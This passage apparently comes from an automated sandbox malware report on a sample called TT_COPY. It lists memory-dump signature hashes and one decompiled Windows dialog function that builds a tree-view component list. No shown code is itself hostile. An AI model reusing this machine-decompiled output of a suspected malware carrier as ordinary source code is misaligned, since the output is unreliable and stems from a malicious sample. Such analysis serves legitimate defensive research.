                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 22be8010df5b1ee29005a33c4d3e2c502036d738c5d8bece8b9160881c1bfc92
                                                                                                                            • Instruction ID: 59fbd019f578e26478c7f31729a943934849b5fd5ecb1184dc8d8ed1124f71b1
                                                                                                                            • Opcode Fuzzy Hash: 22be8010df5b1ee29005a33c4d3e2c502036d738c5d8bece8b9160881c1bfc92
                                                                                                                            • Instruction Fuzzy Hash: B79104316043898FDF78CE79C9A93EA37A6FF99340F54816ACC4E8B219D7719A41CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 728c0074da154dfd7175bdf335b7a15f90bbbff5f24aa01a0966d0d9773d11fd
                                                                                                                            • Instruction ID: 60113a8b167a501d7fefdb0a4797292408eaf8dcd6ead3e36c01b0847137e21e
                                                                                                                            • Opcode Fuzzy Hash: 728c0074da154dfd7175bdf335b7a15f90bbbff5f24aa01a0966d0d9773d11fd
                                                                                                                            • Instruction Fuzzy Hash: BD8115716143898FCF75CE2D89593EA37E6BF89300F9482A9CC8DCB219D7355A46CA11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4577b2d360af07847660c93d50966c919e7d4d4c19e897cdd42d824254e7e533
                                                                                                                            • Instruction ID: 78e6d5bc004e65df7c8566a4b74a61a599128444e1e4d2ebf792e914f3dc4e60
                                                                                                                            • Opcode Fuzzy Hash: 4577b2d360af07847660c93d50966c919e7d4d4c19e897cdd42d824254e7e533
                                                                                                                            • Instruction Fuzzy Hash: 2E7104716083898FDF74CF7989A93EA37A2BF89340F50426ACC4D9B219D7754A86CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5aa29f59b850c35a059168cc6f4aaf3b2085d931f1a4e29bd3791c9946beb245
                                                                                                                            • Instruction ID: 0b3dfc35ba0c14555937c82f98abe489269e2ca9e13de417523b687054f4d46f
                                                                                                                            • Opcode Fuzzy Hash: 5aa29f59b850c35a059168cc6f4aaf3b2085d931f1a4e29bd3791c9946beb245
                                                                                                                            • Instruction Fuzzy Hash: C67105716083898FDF74CE798DA93EB37A6BF89340F50426ACC4D9B219D7714A86CB11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 75849c9f381df3ece4d020a2b82496088be9cdfa03e330e787039b94825a359a
                                                                                                                            • Instruction ID: f12e6388fde26d901d3c28b22f06c8ef8590fcd33b9d196ccf2f71b063dfcea6
                                                                                                                            • Opcode Fuzzy Hash: 75849c9f381df3ece4d020a2b82496088be9cdfa03e330e787039b94825a359a
                                                                                                                            • Instruction Fuzzy Hash: 1F113972604298CFCB34CE58D88CBEC7BB1EB19B54F49809BDC889B254C338AA41CB15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8db6cb9a64fe9c979acb102b265b33fc38c4a86b79ed90bd484cd4469d1a302e
                                                                                                                            • Instruction ID: e55241f7f35fdc9ed5556154cabf6cd71b59c0da35624983afe38ed4fbce8ae8
                                                                                                                            • Opcode Fuzzy Hash: 8db6cb9a64fe9c979acb102b265b33fc38c4a86b79ed90bd484cd4469d1a302e
                                                                                                                            • Instruction Fuzzy Hash: FAC08C4B8064D00E73A629F5AF0C2B8944213A323030983D03C19D730FF944EDC8655A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                                                                            • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                                                                                            • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                                                                            • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2b20000_TT_COPY.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ea3d20ad772481af49267bdec6382d6ea7d5d3c8cf345d49464759e0615a0ae
                                                                                                                            • Instruction ID: 858830d61b6d1e97db3d4fe4a9d91191eb05057579ee4c1d00fd812c44f0cef2
                                                                                                                            • Opcode Fuzzy Hash: 8ea3d20ad772481af49267bdec6382d6ea7d5d3c8cf345d49464759e0615a0ae
                                                                                                                            • Instruction Fuzzy Hash: 0BB00275751641CFCE55DF19C190F4073F4F758790F4554D0E855C7B51C364E900C910
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                            				struct HWND__* _v8;
                                                                                                                            				struct HWND__* _v12;
                                                                                                                            				long _v16;
                                                                                                                            				signed int _v20;
                                                                                                                            				signed int _v24;
                                                                                                                            				intOrPtr _v28;
                                                                                                                            				signed char* _v32;
                                                                                                                            				int _v36;
                                                                                                                            				signed int _v44;
                                                                                                                            				int _v48;
                                                                                                                            				signed int* _v60;
                                                                                                                            				signed char* _v64;
                                                                                                                            				signed int _v68;
                                                                                                                            				long _v72;
                                                                                                                            				void* _v76;
                                                                                                                            				intOrPtr _v80;
                                                                                                                            				intOrPtr _v84;
                                                                                                                            				void* _v88;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				signed int _t198;
                                                                                                                            				intOrPtr _t201;
                                                                                                                            				long _t207;
                                                                                                                            				signed int _t211;
                                                                                                                            				signed int _t222;
                                                                                                                            				void* _t225;
                                                                                                                            				void* _t226;
                                                                                                                            				int _t232;
                                                                                                                            				long _t237;
                                                                                                                            				long _t238;
                                                                                                                            				signed int _t239;
                                                                                                                            				signed int _t245;
                                                                                                                            				signed int _t247;
                                                                                                                            				signed char _t248;
                                                                                                                            				signed char _t254;
                                                                                                                            				void* _t258;
                                                                                                                            				void* _t260;
                                                                                                                            				signed char* _t278;
                                                                                                                            				signed char _t279;
                                                                                                                            				long _t284;
                                                                                                                            				struct HWND__* _t291;
                                                                                                                            				signed int* _t292;
                                                                                                                            				int _t293;
                                                                                                                            				long _t294;
                                                                                                                            				signed int _t295;
                                                                                                                            				void* _t297;
                                                                                                                            				long _t298;
                                                                                                                            				int _t299;
                                                                                                                            				signed int _t300;
                                                                                                                            				signed int _t303;
                                                                                                                            				signed int _t311;
                                                                                                                            				signed char* _t319;
                                                                                                                            				int _t324;
                                                                                                                            				void* _t326;
                                                                                                                            
                                                                                                                            				_t291 = _a4;
                                                                                                                            				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                                                            				_v8 = GetDlgItem(_t291, 0x408);
                                                                                                                            				_t326 = SendMessageW;
                                                                                                                            				_v24 =  *0x434f28;
                                                                                                                            				_v28 =  *0x434f10 + 0x94;
                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                            					L23:
                                                                                                                            					if(_a8 != 0x405) {
                                                                                                                            						_t301 = _a16;
                                                                                                                            					} else {
                                                                                                                            						_a12 = 0;
                                                                                                                            						_t301 = 1;
                                                                                                                            						_a8 = 0x40f;
                                                                                                                            						_a16 = 1;
                                                                                                                            					}
                                                                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                            						_v16 = _t301;
                                                                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                                                            							if(( *0x434f19 & 0x00000002) != 0) {
                                                                                                                            								L41:
                                                                                                                            								if(_v16 != 0) {
                                                                                                                            									_t237 = _v16;
                                                                                                                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                                                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                                                            									}
                                                                                                                            									_t238 = _v16;
                                                                                                                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                                                            										_t301 = _v24;
                                                                                                                            										_t239 =  *(_t238 + 0x5c);
                                                                                                                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                                                            										} else {
                                                                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								goto L48;
                                                                                                                            							}
                                                                                                                            							if(_a8 == 0x413) {
                                                                                                                            								L33:
                                                                                                                            								_t301 = 0 | _a8 != 0x00000413;
                                                                                                                            								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                                                                            								_t295 = _t245;
                                                                                                                            								if(_t295 >= 0) {
                                                                                                                            									_t94 = _v24 + 8; // 0x8
                                                                                                                            									_t301 = _t245 * 0x818 + _t94;
                                                                                                                            									_t247 =  *_t301;
                                                                                                                            									if((_t247 & 0x00000010) == 0) {
                                                                                                                            										if((_t247 & 0x00000040) == 0) {
                                                                                                                            											_t248 = _t247 ^ 0x00000001;
                                                                                                                            										} else {
                                                                                                                            											_t254 = _t247 ^ 0x00000080;
                                                                                                                            											if(_t254 >= 0) {
                                                                                                                            												_t248 = _t254 & 0x000000fe;
                                                                                                                            											} else {
                                                                                                                            												_t248 = _t254 | 0x00000001;
                                                                                                                            											}
                                                                                                                            										}
                                                                                                                            										 *_t301 = _t248;
                                                                                                                            										E0040117D(_t295);
                                                                                                                            										_a12 = _t295 + 1;
                                                                                                                            										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                                                                            										_a8 = 0x40f;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            								goto L41;
                                                                                                                            							}
                                                                                                                            							_t301 = _a16;
                                                                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                            								goto L41;
                                                                                                                            							}
                                                                                                                            							goto L33;
                                                                                                                            						} else {
                                                                                                                            							goto L48;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						L48:
                                                                                                                            						if(_a8 != 0x111) {
                                                                                                                            							L56:
                                                                                                                            							if(_a8 == 0x200) {
                                                                                                                            								SendMessageW(_v8, 0x200, 0, 0);
                                                                                                                            							}
                                                                                                                            							if(_a8 == 0x40b) {
                                                                                                                            								_t225 =  *0x42d24c;
                                                                                                                            								if(_t225 != 0) {
                                                                                                                            									ImageList_Destroy(_t225);
                                                                                                                            								}
                                                                                                                            								_t226 =  *0x42d260;
                                                                                                                            								if(_t226 != 0) {
                                                                                                                            									GlobalFree(_t226);
                                                                                                                            								}
                                                                                                                            								 *0x42d24c = 0;
                                                                                                                            								 *0x42d260 = 0;
                                                                                                                            								 *0x434f60 = 0;
                                                                                                                            							}
                                                                                                                            							if(_a8 != 0x40f) {
                                                                                                                            								L90:
                                                                                                                            								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                                                                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                            									ShowWindow(_v8, _t324);
                                                                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                                                            								}
                                                                                                                            								goto L93;
                                                                                                                            							} else {
                                                                                                                            								E004011EF(_t301, 0, 0);
                                                                                                                            								_t198 = _a12;
                                                                                                                            								if(_t198 != 0) {
                                                                                                                            									if(_t198 != 0xffffffff) {
                                                                                                                            										_t198 = _t198 - 1;
                                                                                                                            									}
                                                                                                                            									_push(_t198);
                                                                                                                            									_push(8);
                                                                                                                            									E00404ED4();
                                                                                                                            								}
                                                                                                                            								if(_a16 == 0) {
                                                                                                                            									L75:
                                                                                                                            									E004011EF(_t301, 0, 0);
                                                                                                                            									_v36 =  *0x42d260;
                                                                                                                            									_t201 =  *0x434f28;
                                                                                                                            									_v64 = 0xf030;
                                                                                                                            									_v24 = 0;
                                                                                                                            									if( *0x434f2c <= 0) {
                                                                                                                            										L86:
                                                                                                                            										if( *0x434fbe == 0x400) {
                                                                                                                            											InvalidateRect(_v8, 0, 1);
                                                                                                                            										}
                                                                                                                            										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                                                                                            											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                                                                            										}
                                                                                                                            										goto L90;
                                                                                                                            									}
                                                                                                                            									_t292 = _t201 + 8;
                                                                                                                            									do {
                                                                                                                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                            										if(_t207 != 0) {
                                                                                                                            											_t303 =  *_t292;
                                                                                                                            											_v72 = _t207;
                                                                                                                            											_v76 = 8;
                                                                                                                            											if((_t303 & 0x00000001) != 0) {
                                                                                                                            												_v76 = 9;
                                                                                                                            												_v60 =  &(_t292[4]);
                                                                                                                            												_t292[0] = _t292[0] & 0x000000fe;
                                                                                                                            											}
                                                                                                                            											if((_t303 & 0x00000040) == 0) {
                                                                                                                            												_t211 = (_t303 & 0x00000001) + 1;
                                                                                                                            												if((_t303 & 0x00000010) != 0) {
                                                                                                                            													_t211 = _t211 + 3;
                                                                                                                            												}
                                                                                                                            											} else {
                                                                                                                            												_t211 = 3;
                                                                                                                            											}
                                                                                                                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                                                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                                                            										}
                                                                                                                            										_v24 = _v24 + 1;
                                                                                                                            										_t292 =  &(_t292[0x206]);
                                                                                                                            									} while (_v24 <  *0x434f2c);
                                                                                                                            									goto L86;
                                                                                                                            								} else {
                                                                                                                            									_t293 = E004012E2( *0x42d260);
                                                                                                                            									E00401299(_t293);
                                                                                                                            									_t222 = 0;
                                                                                                                            									_t301 = 0;
                                                                                                                            									if(_t293 <= 0) {
                                                                                                                            										L74:
                                                                                                                            										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                                                            										_a16 = _t293;
                                                                                                                            										_a8 = 0x420;
                                                                                                                            										goto L75;
                                                                                                                            									} else {
                                                                                                                            										goto L71;
                                                                                                                            									}
                                                                                                                            									do {
                                                                                                                            										L71:
                                                                                                                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                                                            											_t301 = _t301 + 1;
                                                                                                                            										}
                                                                                                                            										_t222 = _t222 + 1;
                                                                                                                            									} while (_t222 < _t293);
                                                                                                                            									goto L74;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                            							goto L93;
                                                                                                                            						} else {
                                                                                                                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                                                            							if(_t232 == 0xffffffff) {
                                                                                                                            								goto L93;
                                                                                                                            							}
                                                                                                                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                                                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                                                            								_t294 = 0x20;
                                                                                                                            							}
                                                                                                                            							E00401299(_t294);
                                                                                                                            							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                                                            							_a12 = _a12 | 0xffffffff;
                                                                                                                            							_a16 = 0;
                                                                                                                            							_a8 = 0x40f;
                                                                                                                            							goto L56;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_v36 = 0;
                                                                                                                            					_v20 = 2;
                                                                                                                            					 *0x434f60 = _t291;
                                                                                                                            					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                                                                            					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                                                                            					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                                                                            					_t297 = _t258;
                                                                                                                            					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                                                                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                            					 *0x42d24c = _t260;
                                                                                                                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                                                            					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                                                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                                            					}
                                                                                                                            					DeleteObject(_t297);
                                                                                                                            					_t298 = 0;
                                                                                                                            					do {
                                                                                                                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                                                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                                                            							if(_t298 != 0x20) {
                                                                                                                            								_v20 = 0;
                                                                                                                            							}
                                                                                                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                                                            						}
                                                                                                                            						_t298 = _t298 + 1;
                                                                                                                            					} while (_t298 < 0x21);
                                                                                                                            					_t299 = _a16;
                                                                                                                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                                                            					_push(0x15);
                                                                                                                            					E00404499(_a4);
                                                                                                                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                                                            					_push(0x16);
                                                                                                                            					E00404499(_a4);
                                                                                                                            					_t300 = 0;
                                                                                                                            					_v16 = 0;
                                                                                                                            					if( *0x434f2c <= 0) {
                                                                                                                            						L19:
                                                                                                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                            						goto L20;
                                                                                                                            					} else {
                                                                                                                            						_t319 = _v24 + 8;
                                                                                                                            						_v32 = _t319;
                                                                                                                            						do {
                                                                                                                            							_t278 =  &(_t319[0x10]);
                                                                                                                            							if( *_t278 != 0) {
                                                                                                                            								_v64 = _t278;
                                                                                                                            								_t279 =  *_t319;
                                                                                                                            								_v88 = _v16;
                                                                                                                            								_t311 = 0x20;
                                                                                                                            								_v84 = 0xffff0002;
                                                                                                                            								_v80 = 0xd;
                                                                                                                            								_v68 = _t311;
                                                                                                                            								_v44 = _t300;
                                                                                                                            								_v72 = _t279 & _t311;
                                                                                                                            								if((_t279 & 0x00000002) == 0) {
                                                                                                                            									if((_t279 & 0x00000004) == 0) {
                                                                                                                            										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                            									} else {
                                                                                                                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                                                            									}
                                                                                                                            								} else {
                                                                                                                            									_v80 = 0x4d;
                                                                                                                            									_v48 = 1;
                                                                                                                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                            									_v36 = 1;
                                                                                                                            									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                                                                            									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							_t300 = _t300 + 1;
                                                                                                                            							_t319 =  &(_v32[0x818]);
                                                                                                                            							_v32 = _t319;
                                                                                                                            						} while (_t300 <  *0x434f2c);
                                                                                                                            						if(_v36 != 0) {
                                                                                                                            							L20:
                                                                                                                            							if(_v20 != 0) {
                                                                                                                            								E004044CE(_v8);
                                                                                                                            								goto L23;
                                                                                                                            							} else {
                                                                                                                            								ShowWindow(_v12, 5);
                                                                                                                            								E004044CE(_v12);
                                                                                                                            								L93:
                                                                                                                            								return E00404500(_a8, _a12, _a16);
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						goto L19;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            			}


























































                                                                                                                            0x00404f0d
                                                                                                                            0x00404f26
                                                                                                                            0x00404f2b
                                                                                                                            0x00404f33
                                                                                                                            0x00404f39
                                                                                                                            0x00404f4f
                                                                                                                            0x00404f52
                                                                                                                            0x0040517d
                                                                                                                            0x00405184
                                                                                                                            0x00405198
                                                                                                                            0x00405186
                                                                                                                            0x00405188
                                                                                                                            0x0040518b
                                                                                                                            0x0040518c
                                                                                                                            0x00405193
                                                                                                                            0x00405193
                                                                                                                            0x004051a4
                                                                                                                            0x004051b2
                                                                                                                            0x004051b5
                                                                                                                            0x004051cb
                                                                                                                            0x00405240
                                                                                                                            0x00405243
                                                                                                                            0x00405245
                                                                                                                            0x0040524f
                                                                                                                            0x0040525d
                                                                                                                            0x0040525d
                                                                                                                            0x0040525f
                                                                                                                            0x00405269
                                                                                                                            0x0040526f
                                                                                                                            0x00405272
                                                                                                                            0x00405275
                                                                                                                            0x00405290
                                                                                                                            0x00405277
                                                                                                                            0x00405281
                                                                                                                            0x00405281
                                                                                                                            0x00405275
                                                                                                                            0x00405269
                                                                                                                            0x00000000
                                                                                                                            0x00405243
                                                                                                                            0x004051d0
                                                                                                                            0x004051db
                                                                                                                            0x004051e0
                                                                                                                            0x004051e7
                                                                                                                            0x004051ec
                                                                                                                            0x004051f0
                                                                                                                            0x004051fb
                                                                                                                            0x004051fb
                                                                                                                            0x004051ff
                                                                                                                            0x00405203
                                                                                                                            0x00405207
                                                                                                                            0x0040521a
                                                                                                                            0x00405209
                                                                                                                            0x00405209
                                                                                                                            0x00405210
                                                                                                                            0x00405216
                                                                                                                            0x00405212
                                                                                                                            0x00405212
                                                                                                                            0x00405212
                                                                                                                            0x00405210
                                                                                                                            0x0040521e
                                                                                                                            0x00405220
                                                                                                                            0x00405233
                                                                                                                            0x00405236
                                                                                                                            0x00405239
                                                                                                                            0x00405239
                                                                                                                            0x00405203
                                                                                                                            0x00000000
                                                                                                                            0x004051f0
                                                                                                                            0x004051d2
                                                                                                                            0x004051d9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405293
                                                                                                                            0x00405293
                                                                                                                            0x0040529a
                                                                                                                            0x0040530b
                                                                                                                            0x00405313
                                                                                                                            0x0040531b
                                                                                                                            0x0040531b
                                                                                                                            0x00405324
                                                                                                                            0x00405326
                                                                                                                            0x0040532d
                                                                                                                            0x00405330
                                                                                                                            0x00405330
                                                                                                                            0x00405336
                                                                                                                            0x0040533d
                                                                                                                            0x00405340
                                                                                                                            0x00405340
                                                                                                                            0x00405346
                                                                                                                            0x0040534c
                                                                                                                            0x00405352
                                                                                                                            0x00405352
                                                                                                                            0x0040535f
                                                                                                                            0x004054c0
                                                                                                                            0x004054c7
                                                                                                                            0x004054e4
                                                                                                                            0x004054ea
                                                                                                                            0x004054fc
                                                                                                                            0x004054fc
                                                                                                                            0x00000000
                                                                                                                            0x00405365
                                                                                                                            0x00405367
                                                                                                                            0x0040536c
                                                                                                                            0x00405371
                                                                                                                            0x00405376
                                                                                                                            0x00405378
                                                                                                                            0x00405378
                                                                                                                            0x00405379
                                                                                                                            0x0040537a
                                                                                                                            0x0040537c
                                                                                                                            0x0040537c
                                                                                                                            0x00405384
                                                                                                                            0x004053c5
                                                                                                                            0x004053c7
                                                                                                                            0x004053d7
                                                                                                                            0x004053da
                                                                                                                            0x004053df
                                                                                                                            0x004053e6
                                                                                                                            0x004053e9
                                                                                                                            0x0040548b
                                                                                                                            0x00405494
                                                                                                                            0x0040549c
                                                                                                                            0x0040549c
                                                                                                                            0x004054aa
                                                                                                                            0x004054bb
                                                                                                                            0x004054bb
                                                                                                                            0x00000000
                                                                                                                            0x004054aa
                                                                                                                            0x004053ef
                                                                                                                            0x004053f2
                                                                                                                            0x004053f8
                                                                                                                            0x004053fd
                                                                                                                            0x004053ff
                                                                                                                            0x00405401
                                                                                                                            0x00405407
                                                                                                                            0x0040540e
                                                                                                                            0x00405413
                                                                                                                            0x0040541a
                                                                                                                            0x0040541d
                                                                                                                            0x0040541d
                                                                                                                            0x00405424
                                                                                                                            0x00405430
                                                                                                                            0x00405434
                                                                                                                            0x00405436
                                                                                                                            0x00405436
                                                                                                                            0x00405426
                                                                                                                            0x00405428
                                                                                                                            0x00405428
                                                                                                                            0x00405456
                                                                                                                            0x00405462
                                                                                                                            0x00405471
                                                                                                                            0x00405471
                                                                                                                            0x00405473
                                                                                                                            0x00405476
                                                                                                                            0x0040547f
                                                                                                                            0x00000000
                                                                                                                            0x00405386
                                                                                                                            0x00405391
                                                                                                                            0x00405394
                                                                                                                            0x00405399
                                                                                                                            0x0040539b
                                                                                                                            0x0040539f
                                                                                                                            0x004053af
                                                                                                                            0x004053b9
                                                                                                                            0x004053bb
                                                                                                                            0x004053be
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004053a1
                                                                                                                            0x004053a1
                                                                                                                            0x004053a7
                                                                                                                            0x004053a9
                                                                                                                            0x004053a9
                                                                                                                            0x004053aa
                                                                                                                            0x004053ab
                                                                                                                            0x00000000
                                                                                                                            0x004053a1
                                                                                                                            0x00405384
                                                                                                                            0x0040535f
                                                                                                                            0x004052a2
                                                                                                                            0x00000000
                                                                                                                            0x004052b8
                                                                                                                            0x004052c2
                                                                                                                            0x004052c7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004052d9
                                                                                                                            0x004052de
                                                                                                                            0x004052ea
                                                                                                                            0x004052ea
                                                                                                                            0x004052ec
                                                                                                                            0x004052fb
                                                                                                                            0x004052fd
                                                                                                                            0x00405301
                                                                                                                            0x00405304
                                                                                                                            0x00000000
                                                                                                                            0x00405304
                                                                                                                            0x004052a2
                                                                                                                            0x00404f58
                                                                                                                            0x00404f5d
                                                                                                                            0x00404f66
                                                                                                                            0x00404f6d
                                                                                                                            0x00404f7f
                                                                                                                            0x00404f8a
                                                                                                                            0x00404f90
                                                                                                                            0x00404f9e
                                                                                                                            0x00404fb2
                                                                                                                            0x00404fb7
